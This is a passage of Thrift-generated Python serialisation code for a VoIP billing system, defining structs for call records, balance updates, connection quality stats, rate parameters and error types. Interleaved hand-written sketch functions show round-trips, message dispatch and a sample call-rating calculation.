oprot.writeFieldEnd()
if self.duration is not None:
oprot.writeFieldBegin('duration', TType.DOUBLE, 8)
oprot.writeDouble(self.duration)
oprot.writeFieldEnd()
if self.billed_duration is not None:
oprot.writeFieldBegin('billed_duration', TType.DOUBLE, 9)
oprot.writeDouble(self.billed_duration)
oprot.writeFieldEnd()
if self.setup_time is not None:
oprot.writeFieldBegin('setup_time', TType.I64, 10)
oprot.writeI64(self.setup_time)
oprot.writeFieldEnd()
if self.connect_time is not None:
oprot.writeFieldBegin('connect_time', TType.I64, 11)
oprot.writeI64(self.connect_time)
oprot.writeFieldEnd()
if self.disconnect_time is not None:
oprot.writeFieldBegin('disconnect_time', TType.I64, 12)
oprot.writeI64(self.disconnect_time)
oprot.writeFieldEnd()
if self.price_1 is not None:
oprot.writeFieldBegin('price_1', TType.DOUBLE, 13)
oprot.writeDouble(self.price_1)
oprot.writeFieldEnd()
if self.price_n is not None:
oprot.writeFieldBegin('price_n', TType.DOUBLE, 14)
oprot.writeDouble(self.price_n)
oprot.writeFieldEnd()
if self.interval_1 is not None:
oprot.writeFieldBegin('interval_1', TType.I32, 15)
oprot.writeI32(self.interval_1)
oprot.writeFieldEnd()
if self.interval_n is not None:
oprot.writeFieldBegin('interval_n', TType.I32, 16)
oprot.writeI32(self.interval_n)
oprot.writeFieldEnd()
if self.post_call_surcharge is not None:
oprot.writeFieldBegin('post_call_surcharge', TType.DOUBLE, 17)
oprot.writeDouble(self.post_call_surcharge)
oprot.writeFieldEnd()
if self.connect_fee is not None:
oprot.writeFieldBegin('connect_fee', TType.DOUBLE, 18)
oprot.writeDouble(self.connect_fee)
oprot.writeFieldEnd()
if self.free_seconds is not None:
oprot.writeFieldBegin('free_seconds', TType.I32, 19)
oprot.writeI32(self.free_seconds)
oprot.writeFieldEnd()
if self.grace_period is not None:
oprot.writeFieldBegin('grace_period', TType.I32, 20)
oprot.writeI32(self.grace_period)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
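# Hand-written usage sketch (not part of the thrift-generated output): a
# minimal round-trip of CdrsCustomersDids through TBinaryProtocol over an
# in-memory buffer. The field values below are illustrative assumptions.
def _example_cdrs_customers_dids_roundtrip():
    rec = CdrsCustomersDids(i_call=1, i_customer=2, i_did=3,
                            did='12025550100', result=0,
                            cost=0.05, duration=61.0, billed_duration=120.0)
    wbuf = TTransport.TMemoryBuffer()
    rec.write(TBinaryProtocol.TBinaryProtocol(wbuf))
    rbuf = TTransport.TMemoryBuffer(wbuf.getvalue())
    decoded = CdrsCustomersDids()
    decoded.read(TBinaryProtocol.TBinaryProtocol(rbuf))
    assert decoded == rec  # generated __eq__ compares the full __dict__
    return decoded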
class UpdateAccountBalanceMessage(object):
"""
Attributes:
- i_account
- delta
"""
thrift_spec = (
None, # 0
(1, TType.I64, 'i_account', None, None, ), # 1
(2, TType.DOUBLE, 'delta', None, None, ), # 2
)
def __init__(self, i_account=None, delta=None,):
self.i_account = i_account
self.delta = delta
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec), iprot.string_length_limit, iprot.container_length_limit)
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.i_account = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.DOUBLE:
self.delta = iprot.readDouble()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('UpdateAccountBalanceMessage')
if self.i_account is not None:
oprot.writeFieldBegin('i_account', TType.I64, 1)
oprot.writeI64(self.i_account)
oprot.writeFieldEnd()
if self.delta is not None:
oprot.writeFieldBegin('delta', TType.DOUBLE, 2)
oprot.writeDouble(self.delta)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
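# Hand-written sketch: structs generated in this module compare by __dict__,
# so two messages with equal fields are equal regardless of identity, and
# __repr__ yields a constructor-like form. Values are illustrative only.
def _example_balance_message_equality():
    a = UpdateAccountBalanceMessage(i_account=7, delta=-1.5)
    b = UpdateAccountBalanceMessage(i_account=7, delta=-1.5)
    assert a == b and not (a != b)
    assert 'i_account=7' in repr(a)
    return repr(a)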
class UpdateCustomerBalanceMessage(object):
"""
Attributes:
- i_customer
- delta
"""
thrift_spec = (
None, # 0
(1, TType.I64, 'i_customer', None, None, ), # 1
(2, TType.DOUBLE, 'delta', None, None, ), # 2
)
def __init__(self, i_customer=None, delta=None,):
self.i_customer = i_customer
self.delta = delta
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec), iprot.string_length_limit, iprot.container_length_limit)
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.i_customer = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.DOUBLE:
self.delta = iprot.readDouble()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('UpdateCustomerBalanceMessage')
if self.i_customer is not None:
oprot.writeFieldBegin('i_customer', TType.I64, 1)
oprot.writeI64(self.i_customer)
oprot.writeFieldEnd()
if self.delta is not None:
oprot.writeFieldBegin('delta', TType.DOUBLE, 2)
oprot.writeDouble(self.delta)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class UpdateVendorBalanceMessage(object):
"""
Attributes:
- i_vendor
- delta
- i_connection
"""
thrift_spec = (
None, # 0
(1, TType.I64, 'i_vendor', None, None, ), # 1
(2, TType.DOUBLE, 'delta', None, None, ), # 2
(3, TType.I64, 'i_connection', None, None, ), # 3
)
def __init__(self, i_vendor=None, delta=None, i_connection=None,):
self.i_vendor = i_vendor
self.delta = delta
self.i_connection = i_connection
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec), iprot.string_length_limit, iprot.container_length_limit)
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.i_vendor = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.DOUBLE:
self.delta = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.I64:
self.i_connection = iprot.readI64()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('UpdateVendorBalanceMessage')
if self.i_vendor is not None:
oprot.writeFieldBegin('i_vendor', TType.I64, 1)
oprot.writeI64(self.i_vendor)
oprot.writeFieldEnd()
if self.delta is not None:
oprot.writeFieldBegin('delta', TType.DOUBLE, 2)
oprot.writeDouble(self.delta)
oprot.writeFieldEnd()
if self.i_connection is not None:
oprot.writeFieldBegin('i_connection', TType.I64, 3)
oprot.writeI64(self.i_connection)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class UpdatePlanMinutesMessage(object):
"""
Attributes:
- i_account
- i_service_plan
- delta
- chargeable_seconds
"""
thrift_spec = (
None, # 0
(1, TType.I64, 'i_account', None, None, ), # 1
(2, TType.I64, 'i_service_plan', None, None, ), # 2
(3, TType.DOUBLE, 'delta', None, None, ), # 3
(4, TType.DOUBLE, 'chargeable_seconds', None, None, ), # 4
)
def __init__(self, i_account=None, i_service_plan=None, delta=None, chargeable_seconds=None,):
self.i_account = i_account
self.i_service_plan = i_service_plan
self.delta = delta
self.chargeable_seconds = chargeable_seconds
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec), iprot.string_length_limit, iprot.container_length_limit)
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.i_account = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.I64:
self.i_service_plan = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.DOUBLE:
self.delta = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.DOUBLE:
self.chargeable_seconds = iprot.readDouble()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('UpdatePlanMinutesMessage')
if self.i_account is not None:
oprot.writeFieldBegin('i_account', TType.I64, 1)
oprot.writeI64(self.i_account)
oprot.writeFieldEnd()
if self.i_service_plan is not None:
oprot.writeFieldBegin('i_service_plan', TType.I64, 2)
oprot.writeI64(self.i_service_plan)
oprot.writeFieldEnd()
if self.delta is not None:
oprot.writeFieldBegin('delta', TType.DOUBLE, 3)
oprot.writeDouble(self.delta)
oprot.writeFieldEnd()
if self.chargeable_seconds is not None:
oprot.writeFieldBegin('chargeable_seconds', TType.DOUBLE, 4)
oprot.writeDouble(self.chargeable_seconds)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
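# Hand-written sketch of dispatching on the four balance/plan update message
# structs above by type; the handler table and returned tuples are
# assumptions for illustration, not part of the generated service API.
def _example_dispatch_update(msg):
    handlers = {
        UpdateAccountBalanceMessage: lambda m: ('account', m.i_account, m.delta),
        UpdateCustomerBalanceMessage: lambda m: ('customer', m.i_customer, m.delta),
        UpdateVendorBalanceMessage: lambda m: ('vendor', m.i_vendor, m.delta),
        UpdatePlanMinutesMessage: lambda m: ('plan', m.i_account, m.delta),
    }
    return handlers[type(msg)](msg)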
class ConnectionQualityStats(object):
"""
Attributes:
- i_connection_quality_stats
- i_connection
- tstamp
- asr
- acd
- action
"""
thrift_spec = (
None, # 0
(1, TType.I64, 'i_connection_quality_stats', None, None, ), # 1
(2, TType.I64, 'i_connection', None, None, ), # 2
(3, TType.I64, 'tstamp', None, None, ), # 3
(4, TType.DOUBLE, 'asr', None, None, ), # 4
(5, TType.I32, 'acd', None, None, ), # 5
(6, TType.STRING, 'action', 'UTF8', None, ), # 6
)
def __init__(self, i_connection_quality_stats=None, i_connection=None, tstamp=None, asr=None, acd=None, action=None,):
self.i_connection_quality_stats = i_connection_quality_stats
self.i_connection = i_connection
self.tstamp = tstamp
self.asr = asr
self.acd = acd
self.action = action
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec), iprot.string_length_limit, iprot.container_length_limit)
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.i_connection_quality_stats = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.I64:
self.i_connection = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.I64:
self.tstamp = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.DOUBLE:
self.asr = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 5:
if ftype == TType.I32:
self.acd = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 6:
if ftype == TType.STRING:
self.action = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('ConnectionQualityStats')
if self.i_connection_quality_stats is not None:
oprot.writeFieldBegin('i_connection_quality_stats', TType.I64, 1)
oprot.writeI64(self.i_connection_quality_stats)
oprot.writeFieldEnd()
if self.i_connection is not None:
oprot.writeFieldBegin('i_connection', TType.I64, 2)
oprot.writeI64(self.i_connection)
oprot.writeFieldEnd()
if self.tstamp is not None:
oprot.writeFieldBegin('tstamp', TType.I64, 3)
oprot.writeI64(self.tstamp)
oprot.writeFieldEnd()
if self.asr is not None:
oprot.writeFieldBegin('asr', TType.DOUBLE, 4)
oprot.writeDouble(self.asr)
oprot.writeFieldEnd()
if self.acd is not None:
oprot.writeFieldBegin('acd', TType.I32, 5)
oprot.writeI32(self.acd)
oprot.writeFieldEnd()
if self.action is not None:
oprot.writeFieldBegin('action', TType.STRING, 6)
oprot.writeString(self.action.encode('utf-8') if sys.version_info[0] == 2 else self.action)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
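# Hand-written sketch: a threshold check over the quality metrics. Treating
# `asr` as a 0..1 answer-seizure ratio and `acd` as average call duration in
# seconds is an assumption inferred from the field names only.
def _example_connection_below_quality(stats, min_asr=0.4, min_acd=30):
    return ((stats.asr is not None and stats.asr < min_asr) or
            (stats.acd is not None and stats.acd < min_acd))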
class RegisterError(TException):
"""
Attributes:
- cause
- i_call
"""
thrift_spec = (
None, # 0
(1, TType.I32, 'cause', None, None, ), # 1
(2, TType.I64, 'i_call', None, None, ), # 2
)
def __init__(self, cause=None, i_call=None,):
self.cause = cause
self.i_call = i_call
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec), iprot.string_length_limit, iprot.container_length_limit)
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I32:
self.cause = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.I64:
self.i_call = iprot.readI64()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('RegisterError')
if self.cause is not None:
oprot.writeFieldBegin('cause', TType.I32, 1)
oprot.writeI32(self.cause)
oprot.writeFieldEnd()
if self.i_call is not None:
oprot.writeFieldBegin('i_call', TType.I64, 2)
oprot.writeI64(self.i_call)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __str__(self):
return repr(self)
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class TryBackupError(TException):
thrift_spec = (
)
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec), iprot.string_length_limit, iprot.container_length_limit)
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('TryBackupError')
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __str__(self):
return repr(self)
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class EagainError(TException):
thrift_spec = (
)
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec), iprot.string_length_limit, iprot.container_length_limit)
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('EagainError')
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __str__(self):
return repr(self)
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
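# Hand-written sketch: the three exception classes above subclass TException,
# so they raise and catch like ordinary exceptions. Reading EagainError as
# "retry later" and TryBackupError as "fail over to a backup endpoint" is an
# assumption suggested by the names, not documented behaviour.
def _example_handle_register_errors(register_call, retries=3):
    for _ in range(retries):
        try:
            return register_call()
        except EagainError:
            continue            # transient; try again
        except TryBackupError:
            raise               # caller should switch to a backup endpoint
        except RegisterError as e:
            raise RuntimeError('register failed, cause=%r i_call=%r'
                               % (e.cause, e.i_call))
    raise EagainError()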
class Billables(object):
"""
Attributes:
- free_seconds
- connect_fee
- price_1
- price_n
- interval_1
- interval_n
- post_call_surcharge
- grace_period
- prefix
- decimal_precision
- cost_round_up
"""
thrift_spec = (
None, # 0
(1, TType.I64, 'free_seconds', None, None, ), # 1
(2, TType.DOUBLE, 'connect_fee', None, None, ), # 2
(3, TType.DOUBLE, 'price_1', None, None, ), # 3
(4, TType.DOUBLE, 'price_n', None, None, ), # 4
(5, TType.I32, 'interval_1', None, None, ), # 5
(6, TType.I32, 'interval_n', None, None, ), # 6
(7, TType.DOUBLE, 'post_call_surcharge', None, None, ), # 7
(8, TType.I32, 'grace_period', None, None, ), # 8
(9, TType.STRING, 'prefix', 'UTF8', None, ), # 9
(10, TType.I32, 'decimal_precision', None, None, ), # 10
(11, TType.BOOL, 'cost_round_up', None, None, ), # 11
)
def __init__(self, free_seconds=None, connect_fee=None, price_1=None, price_n=None, interval_1=None, interval_n=None, post_call_surcharge=None, grace_period=None, prefix=None, decimal_precision=None, cost_round_up=None,):
self.free_seconds = free_seconds
self.connect_fee = connect_fee
self.price_1 = price_1
self.price_n = price_n
self.interval_1 = interval_1
self.interval_n = interval_n
self.post_call_surcharge = post_call_surcharge
self.grace_period = grace_period
self.prefix = prefix
self.decimal_precision = decimal_precision
self.cost_round_up = cost_round_up
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec), iprot.string_length_limit, iprot.container_length_limit)
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.free_seconds = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.DOUBLE:
self.connect_fee = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.DOUBLE:
self.price_1 = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.DOUBLE:
self.price_n = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 5:
if ftype == TType.I32:
self.interval_1 = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 6:
if ftype == TType.I32:
self.interval_n = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 7:
if ftype == TType.DOUBLE:
self.post_call_surcharge = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 8:
if ftype == TType.I32:
self.grace_period = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 9:
if ftype == TType.STRING:
self.prefix = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 10:
if ftype == TType.I32:
self.decimal_precision = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 11:
if ftype == TType.BOOL:
self.cost_round_up = iprot.readBool()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('Billables')
if self.free_seconds is not None:
oprot.writeFieldBegin('free_seconds', TType.I64, 1)
oprot.writeI64(self.free_seconds)
oprot.writeFieldEnd()
if self.connect_fee is not None:
oprot.writeFieldBegin('connect_fee', TType.DOUBLE, 2)
oprot.writeDouble(self.connect_fee)
oprot.writeFieldEnd()
if self.price_1 is not None:
oprot.writeFieldBegin('price_1', TType.DOUBLE, 3)
oprot.writeDouble(self.price_1)
oprot.writeFieldEnd()
if self.price_n is not None:
oprot.writeFieldBegin('price_n', TType.DOUBLE, 4)
oprot.writeDouble(self.price_n)
oprot.writeFieldEnd()
if self.interval_1 is not None:
oprot.writeFieldBegin('interval_1', TType.I32, 5)
oprot.writeI32(self.interval_1)
oprot.writeFieldEnd()
if self.interval_n is not None:
oprot.writeFieldBegin('interval_n', TType.I32, 6)
oprot.writeI32(self.interval_n)
oprot.writeFieldEnd()
if self.post_call_surcharge is not None:
oprot.writeFieldBegin('post_call_surcharge', TType.DOUBLE, 7)
oprot.writeDouble(self.post_call_surcharge)
oprot.writeFieldEnd()
if self.grace_period is not None:
oprot.writeFieldBegin('grace_period', TType.I32, 8)
oprot.writeI32(self.grace_period)
oprot.writeFieldEnd()
if self.prefix is not None:
oprot.writeFieldBegin('prefix', TType.STRING, 9)
oprot.writeString(self.prefix.encode('utf-8') if sys.version_info[0] == 2 else self.prefix)
oprot.writeFieldEnd()
if self.decimal_precision is not None:
oprot.writeFieldBegin('decimal_precision', TType.I32, 10)
oprot.writeI32(self.decimal_precision)
oprot.writeFieldEnd()
if self.cost_round_up is not None:
oprot.writeFieldBegin('cost_round_up', TType.BOOL, 11)
oprot.writeBool(self.cost_round_up)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
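# Hand-written rating sketch. This is one plausible reading of the Billables
# fields (per-minute prices, first/next billing intervals, free seconds,
# surcharge as a fraction, rounding to decimal_precision, defaulting to 5
# here); the production rating algorithm is not defined in this file.
def _example_rate_call(b, duration_seconds):
    import math
    chargeable = max(duration_seconds - (b.free_seconds or 0), 0)
    if chargeable <= 0:
        return 0.0
    first = min(chargeable, b.interval_1 or chargeable)
    rest = chargeable - first
    n_rest = math.ceil(rest / b.interval_n) if rest and b.interval_n else 0
    cost = (b.connect_fee or 0.0)
    cost += (b.price_1 or 0.0) * first / 60.0
    cost += (b.price_n or 0.0) * n_rest * (b.interval_n or 0) / 60.0
    cost *= 1.0 + (b.post_call_surcharge or 0.0)
    scale = 10 ** (b.decimal_precision if b.decimal_precision is not None else 5)
    rounded = math.ceil(cost * scale) if b.cost_round_up else round(cost * scale)
    return rounded / scale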
class AccountBillables(object):
"""
Attributes:
- bparams
- area_name
- i_commission_agent
- commission_size
- i_wholesaler
- fresh_balance
- plan_only
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'bparams', (Billables, Billables.thrift_spec), None, ), # 1
(2, TType.STRUCT, 'area_name', (NullString, NullString.thrift_spec), None, ), # 2
(3, TType.STRUCT, 'i_commission_agent', (NullInt64, NullInt64.thrift_spec), None, ), # 3
(4, TType.DOUBLE, 'commission_size', None, None, ), # 4
(5, TType.I64, 'i_wholesaler', None, None, ), # 5
(6, TType.DOUBLE, 'fresh_balance', None, None, ), # 6
(7, TType.BOOL, 'plan_only', None, None, ), # 7
)
def __init__(self, bparams=None, area_name=None, i_commission_agent=None, commission_size=None, i_wholesaler=None, fresh_balance=None, plan_only=None,):
self.bparams = bparams
self.area_name = area_name
self.i_commission_agent = i_commission_agent
self.commission_size = commission_size
self.i_wholesaler = i_wholesaler
self.fresh_balance = fresh_balance
self.plan_only = plan_only
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec), iprot.string_length_limit, iprot.container_length_limit)
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.bparams = Billables()
self.bparams.read(iprot)
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRUCT:
self.area_name = NullString()
self.area_name.read(iprot)
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.STRUCT:
self.i_commission_agent = NullInt64()
self.i_commission_agent.read(iprot)
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.DOUBLE:
self.commission_size = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 5:
if ftype == TType.I64:
self.i_wholesaler = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 6:
if ftype == TType.DOUBLE:
self.fresh_balance = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 7:
if ftype == TType.BOOL:
self.plan_only = iprot.readBool()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
